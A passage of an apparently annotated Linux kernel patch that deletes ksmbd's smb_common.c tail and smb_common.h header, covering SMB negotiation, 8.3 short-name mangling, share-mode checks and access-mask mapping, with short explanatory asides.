+-		struct dentry *dentry;
+-
+-		if (!dir->dot_dotdot[i]) { /* fill dot entry info */
+-			if (i == 0) {
+-				d_info->name = ".";
+-				d_info->name_len = 1;
+-				dentry = dir->filp->f_path.dentry;
+-			} else {
+-				d_info->name = "..";
+-				d_info->name_len = 2;
+-				dentry = dir->filp->f_path.dentry->d_parent;
+-			}
+-
+-			if (!match_pattern(d_info->name, d_info->name_len,
+-					   search_pattern)) {
+-				dir->dot_dotdot[i] = 1;
+-				continue;
+-			}
+-
+-			ksmbd_kstat.kstat = &kstat;
+-			ksmbd_vfs_fill_dentry_attrs(work,
+-						    user_ns,
+-						    dentry,
+-						    &ksmbd_kstat);
+-			rc = fn(conn, info_level, d_info, &ksmbd_kstat);
+-			if (rc)
+-				break;
+-			if (d_info->out_buf_len <= 0)
+-				break;
+-
+-			dir->dot_dotdot[i] = 1;
+-			if (d_info->flags & SMB2_RETURN_SINGLE_ENTRY) {
+-				d_info->out_buf_len = 0;
+-				break;
+-			}
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_extract_shortname() - get shortname from long filename
+- * @conn:	connection instance
+- * @longname:	source long filename
+- * @shortname:	destination short filename
+- *
+- * Return:	shortname length or 0 when source long name is '.' or '..'
+- * TODO: Though this function conforms to the restrictions of the 8.3 filename
+- * spec, the result differs from Windows 7's. Needs checking.
+- */
+-int ksmbd_extract_shortname(struct ksmbd_conn *conn, const char *longname,
+-			    char *shortname)
+-{
+-	const char *p;
+-	char base[9], extension[4];
+-	char out[13] = {0};
+-	int baselen = 0;
+-	int extlen = 0, len = 0;
+-	unsigned int csum = 0;
+-	const unsigned char *ptr;
+-	bool dot_present = true;
+-
+-	p = longname;
+-	if ((*p == '.') || (!(strcmp(p, "..")))) {
+-		/*no mangling required */
+-		return 0;
+-	}
+-
+-	p = strrchr(longname, '.');
+-	if (p == longname) { /*name starts with a dot*/
+-		strscpy(extension, "___", strlen("___"));
+-	} else {
+-		if (p) {
+-			p++;
+-			while (*p && extlen < 3) {
+-				if (*p != '.')
+-					extension[extlen++] = toupper(*p);
+-				p++;
+-			}
+-			extension[extlen] = '\0';
+-		} else {
+-			dot_present = false;
+-		}
+-	}
+-
+-	p = longname;
+-	if (*p == '.') {
+-		p++;
+-		longname++;
+-	}
+-	while (*p && (baselen < 5)) {
+-		if (*p != '.')
+-			base[baselen++] = toupper(*p);
+-		p++;
+-	}
+-
+-	base[baselen] = MAGIC_CHAR;
+-	memcpy(out, base, baselen + 1);
+-
+-	ptr = longname;
+-	len = strlen(longname);
+-	for (; len > 0; len--, ptr++)
+-		csum += *ptr;
+-
+-	csum = csum % (MANGLE_BASE * MANGLE_BASE);
+-	out[baselen + 1] = mangle(csum / MANGLE_BASE);
+-	out[baselen + 2] = mangle(csum);
+-	out[baselen + 3] = PERIOD;
+-
+-	if (dot_present)
+-		memcpy(&out[baselen + 4], extension, 4);
+-	else
+-		out[baselen + 4] = '\0';
+-	smbConvertToUTF16((__le16 *)shortname, out, PATH_MAX,
+-			  conn->local_nls, 0);
+-	len = strlen(out) * 2;
+-	return len;
+-}
+-
+-static int __smb2_negotiate(struct ksmbd_conn *conn)
+-{
+-	return (conn->dialect >= SMB20_PROT_ID &&
+-		conn->dialect <= SMB311_PROT_ID);
+-}
+-
+-static int smb_handle_negotiate(struct ksmbd_work *work)
+-{
+-	struct smb_negotiate_rsp *neg_rsp = work->response_buf;
+-
+-	ksmbd_debug(SMB, "Unsupported SMB1 protocol\n");
+-
+-	/* Add 2 byte bcc and 2 byte DialectIndex. */
+-	inc_rfc1001_len(work->response_buf, 4);
+-	neg_rsp->hdr.Status.CifsError = STATUS_SUCCESS;
+-
+-	neg_rsp->hdr.WordCount = 1;
+-	neg_rsp->DialectIndex = cpu_to_le16(work->conn->dialect);
+-	neg_rsp->ByteCount = 0;
+-	return 0;
+-}
+-
+-int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command)
+-{
+-	struct ksmbd_conn *conn = work->conn;
+-	int ret;
+-
+-	conn->dialect =
+-		ksmbd_negotiate_smb_dialect(work->request_buf);
+-	ksmbd_debug(SMB, "conn->dialect 0x%x\n", conn->dialect);
+-
+-	if (command == SMB2_NEGOTIATE_HE) {
+-		ret = smb2_handle_negotiate(work);
+-		return ret;
+-	}
+-
+-	if (command == SMB_COM_NEGOTIATE) {
+-		if (__smb2_negotiate(conn)) {
+-			init_smb3_11_server(conn);
+-			init_smb2_neg_rsp(work);
+-			ksmbd_debug(SMB, "Upgrade to SMB2 negotiation\n");
+-			return 0;
+-		}
+-		return smb_handle_negotiate(work);
+-	}
+-
+-	pr_err("Unknown SMB negotiation command: %u\n", command);
+-	return -EINVAL;
+-}
+-
+-enum SHARED_MODE_ERRORS {
+-	SHARE_DELETE_ERROR,
+-	SHARE_READ_ERROR,
+-	SHARE_WRITE_ERROR,
+-	FILE_READ_ERROR,
+-	FILE_WRITE_ERROR,
+-	FILE_DELETE_ERROR,
+-};
+-
+-static const char * const shared_mode_errors[] = {
+-	"Current access mode does not permit SHARE_DELETE",
+-	"Current access mode does not permit SHARE_READ",
+-	"Current access mode does not permit SHARE_WRITE",
+-	"Desired access mode does not permit FILE_READ",
+-	"Desired access mode does not permit FILE_WRITE",
+-	"Desired access mode does not permit FILE_DELETE",
+-};
+-
+-static void smb_shared_mode_error(int error, struct ksmbd_file *prev_fp,
+-				  struct ksmbd_file *curr_fp)
+-{
+-	ksmbd_debug(SMB, "%s\n", shared_mode_errors[error]);
+-	ksmbd_debug(SMB, "Current mode: 0x%x Desired mode: 0x%x\n",
+-		    prev_fp->saccess, curr_fp->daccess);
+-}
+-
+-int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp)
+-{
+-	int rc = 0;
+-	struct ksmbd_file *prev_fp;
+-
+-	/*
+-	 * Lookup fp in master fp list, and check desired access and
+-	 * shared mode between previous open and current open.
+-	 */
+-	read_lock(&curr_fp->f_ci->m_lock);
+-	list_for_each_entry(prev_fp, &curr_fp->f_ci->m_fp_list, node) {
+-		if (file_inode(filp) != file_inode(prev_fp->filp))
+-			continue;
+-
+-		if (filp == prev_fp->filp)
+-			continue;
+-
+-		if (ksmbd_stream_fd(prev_fp) && ksmbd_stream_fd(curr_fp))
+-			if (strcmp(prev_fp->stream.name, curr_fp->stream.name))
+-				continue;
+-
+-		if (prev_fp->attrib_only != curr_fp->attrib_only)
+-			continue;
+-
+-		if (!(prev_fp->saccess & FILE_SHARE_DELETE_LE) &&
+-		    curr_fp->daccess & FILE_DELETE_LE) {
+-			smb_shared_mode_error(SHARE_DELETE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		/*
+-		 * Only check FILE_SHARE_DELETE if stream opened and
+-		 * normal file opened.
+-		 */
+-		if (ksmbd_stream_fd(prev_fp) && !ksmbd_stream_fd(curr_fp))
+-			continue;
+-
+-		if (!(prev_fp->saccess & FILE_SHARE_READ_LE) &&
+-		    curr_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE)) {
+-			smb_shared_mode_error(SHARE_READ_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (!(prev_fp->saccess & FILE_SHARE_WRITE_LE) &&
+-		    curr_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE)) {
+-			smb_shared_mode_error(SHARE_WRITE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (prev_fp->daccess & (FILE_EXECUTE_LE | FILE_READ_DATA_LE) &&
+-		    !(curr_fp->saccess & FILE_SHARE_READ_LE)) {
+-			smb_shared_mode_error(FILE_READ_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (prev_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE) &&
+-		    !(curr_fp->saccess & FILE_SHARE_WRITE_LE)) {
+-			smb_shared_mode_error(FILE_WRITE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-
+-		if (prev_fp->daccess & FILE_DELETE_LE &&
+-		    !(curr_fp->saccess & FILE_SHARE_DELETE_LE)) {
+-			smb_shared_mode_error(FILE_DELETE_ERROR,
+-					      prev_fp,
+-					      curr_fp);
+-			rc = -EPERM;
+-			break;
+-		}
+-	}
+-	read_unlock(&curr_fp->f_ci->m_lock);
+-
+-	return rc;
+-}
+-
+-bool is_asterisk(char *p)
+-{
+-	return p && p[0] == '*';
+-}
+-
+-int ksmbd_override_fsids(struct ksmbd_work *work)
+-{
+-	struct ksmbd_session *sess = work->sess;
+-	struct ksmbd_share_config *share = work->tcon->share_conf;
+-	struct cred *cred;
+-	struct group_info *gi;
+-	unsigned int uid;
+-	unsigned int gid;
+-
+-	uid = user_uid(sess->user);
+-	gid = user_gid(sess->user);
+-	if (share->force_uid != KSMBD_SHARE_INVALID_UID)
+-		uid = share->force_uid;
+-	if (share->force_gid != KSMBD_SHARE_INVALID_GID)
+-		gid = share->force_gid;
+-
+-	cred = prepare_kernel_cred(NULL);
+-	if (!cred)
+-		return -ENOMEM;
+-
+-	cred->fsuid = make_kuid(&init_user_ns, uid);
+-	cred->fsgid = make_kgid(&init_user_ns, gid);
+-
+-	gi = groups_alloc(0);
+-	if (!gi) {
+-		abort_creds(cred);
+-		return -ENOMEM;
+-	}
+-	set_groups(cred, gi);
+-	put_group_info(gi);
+-
+-	if (!uid_eq(cred->fsuid, GLOBAL_ROOT_UID))
+-		cred->cap_effective = cap_drop_fs_set(cred->cap_effective);
+-
+-	WARN_ON(work->saved_cred);
+-	work->saved_cred = override_creds(cred);
+-	if (!work->saved_cred) {
+-		abort_creds(cred);
+-		return -EINVAL;
+-	}
+-	return 0;
+-}
+-
+-void ksmbd_revert_fsids(struct ksmbd_work *work)
+-{
+-	const struct cred *cred;
+-
+-	WARN_ON(!work->saved_cred);
+-
+-	cred = current_cred();
+-	revert_creds(work->saved_cred);
+-	put_cred(cred);
+-	work->saved_cred = NULL;
+-}
+-
+-__le32 smb_map_generic_desired_access(__le32 daccess)
+-{
+-	if (daccess & FILE_GENERIC_READ_LE) {
+-		daccess |= cpu_to_le32(GENERIC_READ_FLAGS);
+-		daccess &= ~FILE_GENERIC_READ_LE;
+-	}
+-
+-	if (daccess & FILE_GENERIC_WRITE_LE) {
+-		daccess |= cpu_to_le32(GENERIC_WRITE_FLAGS);
+-		daccess &= ~FILE_GENERIC_WRITE_LE;
+-	}
+-
+-	if (daccess & FILE_GENERIC_EXECUTE_LE) {
+-		daccess |= cpu_to_le32(GENERIC_EXECUTE_FLAGS);
+-		daccess &= ~FILE_GENERIC_EXECUTE_LE;
+-	}
+-
+-	if (daccess & FILE_GENERIC_ALL_LE) {
+-		daccess |= cpu_to_le32(GENERIC_ALL_FLAGS);
+-		daccess &= ~FILE_GENERIC_ALL_LE;
+-	}
+-
+-	return daccess;
+-}
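+
+Aside: smb_map_generic_desired_access() above rewrites each GENERIC_* bit of
+a desired-access mask into the concrete rights set that smb_common.h
+(removed next) names GENERIC_*_FLAGS. A host-endian sketch of one such
+substitution, reusing the mask values from that header; map_generic_read is
+an illustrative name, not from this patch.
+
+	#include <stdint.h>
+
+	/* Mask values as defined in the removed smb_common.h. */
+	#define READ_CONTROL		0x00020000u
+	#define FILE_READ_DATA		0x00000001u
+	#define FILE_READ_EA		0x00000008u
+	#define FILE_READ_ATTRIBUTES	0x00000080u
+	#define SYNCHRONIZE		0x00100000u
+	#define GENERIC_READ		0x80000000u
+	#define GENERIC_READ_FLAGS	(READ_CONTROL | FILE_READ_DATA | \
+					 FILE_READ_ATTRIBUTES | FILE_READ_EA | \
+					 SYNCHRONIZE)
+
+	/* Swap the generic bit for its concrete rights set, as the
+	 * little-endian kernel version does for all four GENERIC_* bits. */
+	static uint32_t map_generic_read(uint32_t daccess)
+	{
+		if (daccess & GENERIC_READ) {
+			daccess |= GENERIC_READ_FLAGS;
+			daccess &= ~GENERIC_READ;
+		}
+		return daccess;
+	}
+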
+diff --git a/fs/ksmbd/smb_common.h b/fs/ksmbd/smb_common.h
+deleted file mode 100644
+index 78c44978a906a..0000000000000
+--- a/fs/ksmbd/smb_common.h
++++ /dev/null
+@@ -1,468 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __SMB_COMMON_H__
+-#define __SMB_COMMON_H__
+-
+-#include <linux/kernel.h>
+-
+-#include "glob.h"
+-#include "nterr.h"
+-#include "../smbfs_common/smb2pdu.h"
+-#include "smb2pdu.h"
+-
+-/* ksmbd's Specific ERRNO */
+-#define ESHARE			50000
+-
+-#define SMB1_PROT		0
+-#define SMB2_PROT		1
+-#define SMB21_PROT		2
+-/* multi-protocol negotiate request */
+-#define SMB2X_PROT		3
+-#define SMB30_PROT		4
+-#define SMB302_PROT		5
+-#define SMB311_PROT		6
+-#define BAD_PROT		0xFFFF
+-
+-#define SMB1_VERSION_STRING	"1.0"
+-#define SMB20_VERSION_STRING	"2.0"
+-#define SMB21_VERSION_STRING	"2.1"
+-#define SMB30_VERSION_STRING	"3.0"
+-#define SMB302_VERSION_STRING	"3.02"
+-#define SMB311_VERSION_STRING	"3.1.1"
+-
+-#define SMB_ECHO_INTERVAL	(60 * HZ)
+-
+-#define CIFS_DEFAULT_IOSIZE	(64 * 1024)
+-#define MAX_CIFS_SMALL_BUFFER_SIZE 448 /* big enough for most */
+-
+-#define MAX_STREAM_PROT_LEN	0x00FFFFFF
+-
+-/* Responses when opening a file. */
+-#define F_SUPERSEDED	0
+-#define F_OPENED	1
+-#define F_CREATED	2
+-#define F_OVERWRITTEN	3
+-
+-/*
+- * File Attribute flags
+- */
+-#define ATTR_POSIX_SEMANTICS		0x01000000
+-#define ATTR_BACKUP_SEMANTICS		0x02000000
+-#define ATTR_DELETE_ON_CLOSE		0x04000000
+-#define ATTR_SEQUENTIAL_SCAN		0x08000000
+-#define ATTR_RANDOM_ACCESS		0x10000000
+-#define ATTR_NO_BUFFERING		0x20000000
+-#define ATTR_WRITE_THROUGH		0x80000000
+-
+-/* List of FileSystemAttributes - see 2.5.1 of MS-FSCC */
+-#define FILE_SUPPORTS_SPARSE_VDL	0x10000000 /* faster nonsparse extend */
+-#define FILE_SUPPORTS_BLOCK_REFCOUNTING	0x08000000 /* allow ioctl dup extents */
+-#define FILE_SUPPORT_INTEGRITY_STREAMS	0x04000000
+-#define FILE_SUPPORTS_USN_JOURNAL	0x02000000
+-#define FILE_SUPPORTS_OPEN_BY_FILE_ID	0x01000000
+-#define FILE_SUPPORTS_EXTENDED_ATTRIBUTES 0x00800000
+-#define FILE_SUPPORTS_HARD_LINKS	0x00400000
+-#define FILE_SUPPORTS_TRANSACTIONS	0x00200000
+-#define FILE_SEQUENTIAL_WRITE_ONCE	0x00100000
+-#define FILE_READ_ONLY_VOLUME		0x00080000
+-#define FILE_NAMED_STREAMS		0x00040000
+-#define FILE_SUPPORTS_ENCRYPTION	0x00020000
+-#define FILE_SUPPORTS_OBJECT_IDS	0x00010000
+-#define FILE_VOLUME_IS_COMPRESSED	0x00008000
+-#define FILE_SUPPORTS_REMOTE_STORAGE	0x00000100
+-#define FILE_SUPPORTS_REPARSE_POINTS	0x00000080
+-#define FILE_SUPPORTS_SPARSE_FILES	0x00000040
+-#define FILE_VOLUME_QUOTAS		0x00000020
+-#define FILE_FILE_COMPRESSION		0x00000010
+-#define FILE_PERSISTENT_ACLS		0x00000008
+-#define FILE_UNICODE_ON_DISK		0x00000004
+-#define FILE_CASE_PRESERVED_NAMES	0x00000002
+-#define FILE_CASE_SENSITIVE_SEARCH	0x00000001
+-
+-#define FILE_READ_DATA        0x00000001  /* Data can be read from the file   */
+-#define FILE_WRITE_DATA       0x00000002  /* Data can be written to the file  */
+-#define FILE_APPEND_DATA      0x00000004  /* Data can be appended to the file */
+-#define FILE_READ_EA          0x00000008  /* Extended attributes associated   */
+-/* with the file can be read        */
+-#define FILE_WRITE_EA         0x00000010  /* Extended attributes associated   */
+-/* with the file can be written     */
+-#define FILE_EXECUTE          0x00000020  /*Data can be read into memory from */
+-/* the file using system paging I/O */
+-#define FILE_DELETE_CHILD     0x00000040
+-#define FILE_READ_ATTRIBUTES  0x00000080  /* Attributes associated with the   */
+-/* file can be read                 */
+-#define FILE_WRITE_ATTRIBUTES 0x00000100  /* Attributes associated with the   */
+-/* file can be written              */
+-#define DELETE                0x00010000  /* The file can be deleted          */
+-#define READ_CONTROL          0x00020000  /* The access control list and      */
+-/* ownership associated with the    */
+-/* file can be read                 */
+-#define WRITE_DAC             0x00040000  /* The access control list and      */
+-/* ownership associated with the    */
+-/* file can be written.             */
+-#define WRITE_OWNER           0x00080000  /* Ownership information associated */
+-/* with the file can be written     */
+-#define SYNCHRONIZE           0x00100000  /* The file handle can waited on to */
+-/* synchronize with the completion  */
+-/* of an input/output request       */
+-#define GENERIC_ALL           0x10000000
+-#define GENERIC_EXECUTE       0x20000000
+-#define GENERIC_WRITE         0x40000000
+-#define GENERIC_READ          0x80000000
+-/* In summary - Relevant file       */
+-/* access flags from CIFS are       */
+-/* file_read_data, file_write_data  */
+-/* file_execute, file_read_attributes*/
+-/* write_dac, and delete.           */
+-
+-#define SET_FILE_READ_RIGHTS (FILE_READ_DATA | FILE_READ_EA \
+-		| FILE_READ_ATTRIBUTES \
+-		| DELETE | READ_CONTROL | WRITE_DAC \
+-		| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_WRITE_RIGHTS (FILE_WRITE_DATA | FILE_APPEND_DATA \
+-		| FILE_WRITE_EA \
+-		| FILE_DELETE_CHILD \
+-		| FILE_WRITE_ATTRIBUTES \
+-		| DELETE | READ_CONTROL | WRITE_DAC \
+-		| WRITE_OWNER | SYNCHRONIZE)
+-#define SET_FILE_EXEC_RIGHTS (FILE_READ_EA | FILE_WRITE_EA | FILE_EXECUTE \
+-		| FILE_READ_ATTRIBUTES \
+-		| FILE_WRITE_ATTRIBUTES \
+-		| DELETE | READ_CONTROL | WRITE_DAC \
+-		| WRITE_OWNER | SYNCHRONIZE)
+-
+-#define SET_MINIMUM_RIGHTS (FILE_READ_EA | FILE_READ_ATTRIBUTES \
+-		| READ_CONTROL | SYNCHRONIZE)
+-
+-/* generic flags for file open */
+-#define GENERIC_READ_FLAGS	(READ_CONTROL | FILE_READ_DATA | \
+-		FILE_READ_ATTRIBUTES | \
+-		FILE_READ_EA | SYNCHRONIZE)
+-
+-#define GENERIC_WRITE_FLAGS	(READ_CONTROL | FILE_WRITE_DATA | \
+-		FILE_WRITE_ATTRIBUTES | FILE_WRITE_EA | \
+-		FILE_APPEND_DATA | SYNCHRONIZE)
+-
+-#define GENERIC_EXECUTE_FLAGS	(READ_CONTROL | FILE_EXECUTE | \
+-		FILE_READ_ATTRIBUTES | SYNCHRONIZE)
+-
+-#define GENERIC_ALL_FLAGS	(DELETE | READ_CONTROL | WRITE_DAC | \
+-		WRITE_OWNER | SYNCHRONIZE | FILE_READ_DATA | \
+-		FILE_WRITE_DATA | FILE_APPEND_DATA | \
+-		FILE_READ_EA | FILE_WRITE_EA | \
+-		FILE_EXECUTE | FILE_DELETE_CHILD | \
+-		FILE_READ_ATTRIBUTES | FILE_WRITE_ATTRIBUTES)
+-
+-#define SMB1_PROTO_NUMBER		cpu_to_le32(0x424d53ff)
+-#define SMB_COM_NEGOTIATE		0x72
+-#define SMB1_CLIENT_GUID_SIZE		(16)
+-
+-#define SMBFLG_RESPONSE 0x80	/* this PDU is a response from server */
+-
+-#define SMBFLG2_IS_LONG_NAME	cpu_to_le16(0x40)
+-#define SMBFLG2_EXT_SEC		cpu_to_le16(0x800)
+-#define SMBFLG2_ERR_STATUS	cpu_to_le16(0x4000)
+-#define SMBFLG2_UNICODE		cpu_to_le16(0x8000)
+-
+-struct smb_hdr {
+-	__be32 smb_buf_length;
+-	__u8 Protocol[4];
+-	__u8 Command;
+-	union {
+-		struct {
+-			__u8 ErrorClass;
+-			__u8 Reserved;
+-			__le16 Error;
+-		} __packed DosError;
+-		__le32 CifsError;
+-	} __packed Status;
+-	__u8 Flags;
+-	__le16 Flags2;          /* note: le */
+-	__le16 PidHigh;
+-	union {
+-		struct {
+-			__le32 SequenceNumber;  /* le */
+-			__u32 Reserved; /* zero */
+-		} __packed Sequence;
+-		__u8 SecuritySignature[8];      /* le */
+-	} __packed Signature;
+-	__u8 pad[2];
+-	__le16 Tid;
+-	__le16 Pid;
+-	__le16 Uid;
+-	__le16 Mid;
+-	__u8 WordCount;
+-} __packed;
+-
+-struct smb_negotiate_req {
+-	struct smb_hdr hdr;     /* wct = 0 */
+-	__le16 ByteCount;
+-	unsigned char DialectsArray[1];
+-} __packed;
+-
+-struct smb_negotiate_rsp {
+-	struct smb_hdr hdr;     /* wct = 17 */
+-	__le16 DialectIndex; /* 0xFFFF = no dialect acceptable */
+-	__le16 ByteCount;
+-} __packed;
+-
+-struct filesystem_attribute_info {
+-	__le32 Attributes;
+-	__le32 MaxPathNameComponentLength;
+-	__le32 FileSystemNameLen;
+-	__le16 FileSystemName[1]; /* do not have to save this - get subset? */
+-} __packed;
+-
+-struct filesystem_device_info {
+-	__le32 DeviceType;
+-	__le32 DeviceCharacteristics;
+-} __packed; /* device info level 0x104 */
+-
+-struct filesystem_vol_info {
+-	__le64 VolumeCreationTime;
+-	__le32 SerialNumber;
+-	__le32 VolumeLabelSize;
+-	__le16 Reserved;
+-	__le16 VolumeLabel[1];
+-} __packed;
+-
+-struct filesystem_info {
+-	__le64 TotalAllocationUnits;
+-	__le64 FreeAllocationUnits;
+-	__le32 SectorsPerAllocationUnit;
+-	__le32 BytesPerSector;
+-} __packed;     /* size info, level 0x103 */
+-
+-#define EXTENDED_INFO_MAGIC 0x43667364	/* Cfsd */
+-#define STRING_LENGTH 28
+-
+-struct fs_extended_info {
+-	__le32 magic;
+-	__le32 version;
+-	__le32 release;
+-	__u64 rel_date;
+-	char    version_string[STRING_LENGTH];
+-} __packed;
+-
+-struct object_id_info {
+-	char objid[16];
+-	struct fs_extended_info extended_info;
+-} __packed;
+-
+-struct file_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __packed;   /* level 0x101 FF resp data */
+-
+-struct file_names_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le32 FileNameLength;
+-	char FileName[1];
+-} __packed;   /* level 0xc FF resp data */
+-
+-struct file_full_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize;
+-	char FileName[1];
+-} __packed; /* level 0x102 FF resp */
+-
+-struct file_both_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	__u8   ShortNameLength;
+-	__u8   Reserved;
+-	__u8   ShortName[24];
+-	char FileName[1];
+-} __packed; /* level 0x104 FFrsp data */
+-
+-struct file_id_both_directory_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* length of the xattrs */
+-	__u8   ShortNameLength;
+-	__u8   Reserved;
+-	__u8   ShortName[24];
+-	__le16 Reserved2;
+-	__le64 UniqueId;
+-	char FileName[1];
+-} __packed;
+-
+-struct file_id_full_dir_info {
+-	__le32 NextEntryOffset;
+-	__u32 FileIndex;
+-	__le64 CreationTime;
+-	__le64 LastAccessTime;
+-	__le64 LastWriteTime;
+-	__le64 ChangeTime;
+-	__le64 EndOfFile;
+-	__le64 AllocationSize;
+-	__le32 ExtFileAttributes;
+-	__le32 FileNameLength;
+-	__le32 EaSize; /* EA size */
+-	__le32 Reserved;
+-	__le64 UniqueId; /* inode num - le since Samba puts ino in low 32 bit*/
+-	char FileName[1];
+-} __packed; /* level 0x105 FF rsp data */
+-
+-struct smb_version_values {
+-	char		*version_string;
+-	__u16		protocol_id;
+-	__le16		lock_cmd;
+-	__u32		capabilities;
+-	__u32		max_read_size;
+-	__u32		max_write_size;
+-	__u32		max_trans_size;
+-	__u32		max_credits;
+-	__u32		large_lock_type;
+-	__u32		exclusive_lock_type;
+-	__u32		shared_lock_type;
+-	__u32		unlock_lock_type;
+-	size_t		header_size;
+-	size_t		max_header_size;
+-	size_t		read_rsp_size;
+-	unsigned int	cap_unix;
+-	unsigned int	cap_nt_find;
+-	unsigned int	cap_large_files;
+-	__u16		signing_enabled;
+-	__u16		signing_required;
+-	size_t		create_lease_size;
+-	size_t		create_durable_size;
+-	size_t		create_durable_v2_size;
+-	size_t		create_mxac_size;
+-	size_t		create_disk_id_size;
+-	size_t		create_posix_size;
+-};
+-
+-struct filesystem_posix_info {
+-	/* For undefined recommended transfer size return -1 in that field */
+-	__le32 OptimalTransferSize;  /* bsize on some os, iosize on other os */
+-	__le32 BlockSize;
+-	/* The next three fields are in terms of the block size.
+-	 * (above). If block size is unknown, 4096 would be a
+-	 * reasonable block size for a server to report.
+-	 * Note that returning the blocks/blocksavail removes the need
+-	 * to make a second call (to QFSInfo level 0x103) to get this info.
+-	 * UserBlockAvail is typically less than or equal to BlocksAvail,
+-	 * if no distinction is made return the same value in each
+-	 */
+-	__le64 TotalBlocks;
+-	__le64 BlocksAvail;       /* bfree */
+-	__le64 UserBlocksAvail;   /* bavail */
+-	/* For undefined Node fields or FSID return -1 */
+-	__le64 TotalFileNodes;
+-	__le64 FreeFileNodes;
+-	__le64 FileSysIdentifier;   /* fsid */
+-	/* NB Namelen comes from FILE_SYSTEM_ATTRIBUTE_INFO call */
+-	/* NB flags can come from FILE_SYSTEM_DEVICE_INFO call   */
+-} __packed;
+-
+-struct smb_version_ops {
+-	u16 (*get_cmd_val)(struct ksmbd_work *swork);
+-	int (*init_rsp_hdr)(struct ksmbd_work *swork);
+-	void (*set_rsp_status)(struct ksmbd_work *swork, __le32 err);
+-	int (*allocate_rsp_buf)(struct ksmbd_work *work);
+-	int (*set_rsp_credits)(struct ksmbd_work *work);
+-	int (*check_user_session)(struct ksmbd_work *work);
+-	int (*get_ksmbd_tcon)(struct ksmbd_work *work);
+-	bool (*is_sign_req)(struct ksmbd_work *work, unsigned int command);
+-	int (*check_sign_req)(struct ksmbd_work *work);
+-	void (*set_sign_rsp)(struct ksmbd_work *work);
+-	int (*generate_signingkey)(struct ksmbd_session *sess, struct ksmbd_conn *conn);
+-	int (*generate_encryptionkey)(struct ksmbd_conn *conn, struct ksmbd_session *sess);
+-	bool (*is_transform_hdr)(void *buf);
+-	int (*decrypt_req)(struct ksmbd_work *work);
+-	int (*encrypt_resp)(struct ksmbd_work *work);
+-};
+-
+-struct smb_version_cmds {
+-	int (*proc)(struct ksmbd_work *swork);
+-};
+-
+-int ksmbd_min_protocol(void);
+-int ksmbd_max_protocol(void);
+-
+-int ksmbd_lookup_protocol_idx(char *str);
+-
+-int ksmbd_verify_smb_message(struct ksmbd_work *work);
+-bool ksmbd_smb_request(struct ksmbd_conn *conn);
+-
+-int ksmbd_lookup_dialect_by_id(__le16 *cli_dialects, __le16 dialects_count);
+-
+-void ksmbd_init_smb_server(struct ksmbd_work *work);
+-
+-struct ksmbd_kstat;
+-int ksmbd_populate_dot_dotdot_entries(struct ksmbd_work *work,
+-				      int info_level,
+-				      struct ksmbd_file *dir,
+-				      struct ksmbd_dir_info *d_info,
+-				      char *search_pattern,
+-				      int (*fn)(struct ksmbd_conn *,
+-						int,
+-						struct ksmbd_dir_info *,
+-						struct ksmbd_kstat *));
+-
+-int ksmbd_extract_shortname(struct ksmbd_conn *conn,
+-			    const char *longname,
+-			    char *shortname);
+-
+-int ksmbd_smb_negotiate_common(struct ksmbd_work *work, unsigned int command);
+-
+-int ksmbd_smb_check_shared_mode(struct file *filp, struct ksmbd_file *curr_fp);
+-int ksmbd_override_fsids(struct ksmbd_work *work);
+-void ksmbd_revert_fsids(struct ksmbd_work *work);
+-
+-unsigned int ksmbd_server_side_copy_max_chunk_count(void);
+-unsigned int ksmbd_server_side_copy_max_chunk_size(void);
+-unsigned int ksmbd_server_side_copy_max_total_size(void);
+-bool is_asterisk(char *p);
+-__le32 smb_map_generic_desired_access(__le32 daccess);
+-
+-static inline unsigned int get_rfc1002_len(void *buf)
+-{
+-	return be32_to_cpu(*((__be32 *)buf)) & 0xffffff;
+-}
+-
+-static inline void inc_rfc1001_len(void *buf, int count)
+-{
+-	be32_add_cpu((__be32 *)buf, count);
+-}
+-#endif /* __SMB_COMMON_H__ */
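+
+Aside: compare_sids() in smbacl.c, removed next, orders two SIDs by
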